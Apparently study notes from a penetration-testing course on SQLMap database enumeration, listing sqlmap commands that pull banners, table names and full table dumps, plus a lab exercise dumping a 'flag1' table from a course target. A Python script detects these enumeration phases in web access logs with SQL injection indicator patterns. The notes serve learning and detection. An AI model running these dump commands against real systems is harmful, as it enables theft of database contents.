- Enumeration represents the central part of an SQL injection attack, which is done right after the successful detection and confirmation of exploitability of the targeted SQLi vulnerability
- It consists of lookup and retrieval (i.e., exfiltration) of all the available information from the vulnerable database
# Basic DB Enum
- After a successful detection of an SQLi vulnerability, we begin enumeration of basic database details:
- Database version banner (switch `--banner`)
- Current user name (switch `--current-user`)
- Current database name (switch `--current-db`)
- Checking if the current user has DBA (administrator) rights (switch `--is-dba`)
```bash
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
```
# Table Enum
- After finding the current database name (e.g., `testdb`), the retrieval of table names would be by using the `--tables` option and specifying the DB name with `-D testdb`
```bash
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
```
- After spotting the table name of interest, retrieval of its content can be done by using the `--dump` option and specifying the table name with `-T users`
- The table is also dumped to a local file (CSV by default); the path to it is shown in the console output
```bash
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb
# -T to specify the table name
# -D to specify the database name
```
# Table/Row Enumeration
- When dealing with large tables with many columns and/or rows, we can specify the columns (e.g., only `name` and `surname` columns) with the `-C` option
```bash
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
```
- To narrow down the rows based on their ordinal number(s) inside the table, we can specify the rows with the `--start` and `--stop` options (e.g., start from 2nd up to 3rd entry)
```bash
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3
```
# Full DB Enumeration
- By simply using the switch `--dump` without specifying a table with `-T`, all of the current database content will be retrieved
- As for the `--dump-all` switch, all the content from all the databases will be retrieved
- It is advised to include the switch `--exclude-sysdbs` (e.g. `--dump-all --exclude-sysdbs`), which will instruct SQLMap to skip the retrieval of content from system databases
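Each of the enumeration phases above leaves a recognisable trail in the web server's access log. The following Python script is an added example, not part of these notes or of SQLMap itself: it parses constructed Apache/nginx combined-format log lines, decodes the query string, tags each request with the enumeration phase its indicators point at (version-banner functions for `--banner`, `information_schema` lookups for `--tables`/`-C`, a `SELECT ... FROM` of an application table for `--dump`), notes sqlmap's default User-Agent, and flags a source that touched more than one phase. The log lines, IP addresses (RFC 5737 test ranges), the regex patterns and the alert threshold are all illustrative assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" access-log layout (assumed; adjust for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Query-string indicators grouped by the enumeration phase in the notes above.
# Illustrative assumptions, not an exhaustive signature set.
INDICATORS = {
    "banner": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),            # --banner
    "user":   re.compile(r"current_user|\buser\s*\(\s*\)", re.I),             # --current-user
    "db":     re.compile(r"\bdatabase\s*\(\s*\)|\bschema\s*\(\s*\)", re.I),   # --current-db
    "schema": re.compile(r"information_schema\.(tables|columns)", re.I),      # --tables / -C
    # SELECT ... FROM anything other than information_schema: content retrieval (--dump)
    "dump":   re.compile(r"\bselect\b.*\bfrom\b(?!.*information_schema)", re.I | re.S),
}
# sqlmap's default User-Agent names the tool; trivially changed, so a weak signal on its own.
UA_RE = re.compile(r"sqlmap", re.I)

# Constructed sample traffic; not captured from a real server.
SAMPLE_LOG_LINES = [
    '198.51.100.7 - - [09/Dec/2025:18:03:00 +0000] "GET /case1.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/Dec/2025:18:04:35 +0000] "GET /case1.php?id=1%20AND%20@@version%20LIKE%20%278%25%27 HTTP/1.1" 200 512 "-" "sqlmap/1.8 (https://sqlmap.org)"',
    '203.0.113.5 - - [09/Dec/2025:18:04:36 +0000] "GET /case1.php?id=1%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables)%3E0 HTTP/1.1" 200 512 "-" "sqlmap/1.8 (https://sqlmap.org)"',
    '203.0.113.5 - - [09/Dec/2025:18:05:44 +0000] "GET /case1.php?id=1%20UNION%20SELECT%20name,surname%20FROM%20users HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.9 - - [09/Dec/2025:18:10:02 +0000] "GET /case1.php?id=1%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.columns)%3E0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def classify(line):
    """Parse one access-log line; return None if it does not match the assumed layout."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # Decode twice so a double-URL-encoded payload is still inspected in clear.
    decoded = unquote_plus(unquote_plus(m["path"]))
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "path": decoded,
        "ua_sqlmap": bool(UA_RE.search(m["ua"])),
        "phases": {name for name, rx in INDICATORS.items() if rx.search(decoded)},
    }


def summarize(lines):
    """Aggregate per source IP: request count, sqlmap User-Agent hits, phases observed."""
    by_ip = defaultdict(lambda: {"requests": 0, "sqlmap_ua": 0, "phases": set()})
    for line in lines:
        rec = classify(line)
        if rec is None:
            continue  # skip lines in another format rather than crash the run
        entry = by_ip[rec["ip"]]
        entry["requests"] += 1
        entry["sqlmap_ua"] += int(rec["ua_sqlmap"])
        entry["phases"] |= rec["phases"]
    return dict(by_ip)


def alerts(summary, min_phases=2):
    """Sources worth a ticket: sqlmap User-Agent seen, or at least min_phases phases touched.
    A lone information_schema hit may be a generic scanner or an application bug, so it
    stays below the default threshold."""
    return sorted(ip for ip, s in summary.items()
                  if s["sqlmap_ua"] or len(s["phases"]) >= min_phases)


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG_LINES)
    for ip in alerts(summary):
        s = summary[ip]
        print(f"{ip}: {s['requests']} requests, sqlmap UA x{s['sqlmap_ua']}, "
              f"phases={sorted(s['phases'])}")
```

Run against the constructed lines, only `203.0.113.5` is flagged: it advertises the sqlmap User-Agent on two requests and progresses through banner, schema and dump phases, which is the sequence the notes above describe. `192.0.2.9`, with a single `information_schema` probe from a browser User-Agent, stays below the threshold; lowering `min_phases` to 1 trades that restraint for recall. Because the User-Agent is attacker-controlled, the phase progression per source is the signal to rely on.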
# Exercise
## Case 1
- Detect and exploit the SQLi vulnerability in the GET parameter `id`
- Basic enumeration of database details
```bash
sqlmap -u 'http://94.237.121.111:33358/case1.php?id=1' --banner --current-user --current-db --is-dba
```
![[images/Pasted image 20251209180435.png]]
- Specify table and database names
```bash
sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --dump -T flag1 -D testdb
```
![[images/Pasted image 20251209180544.png]]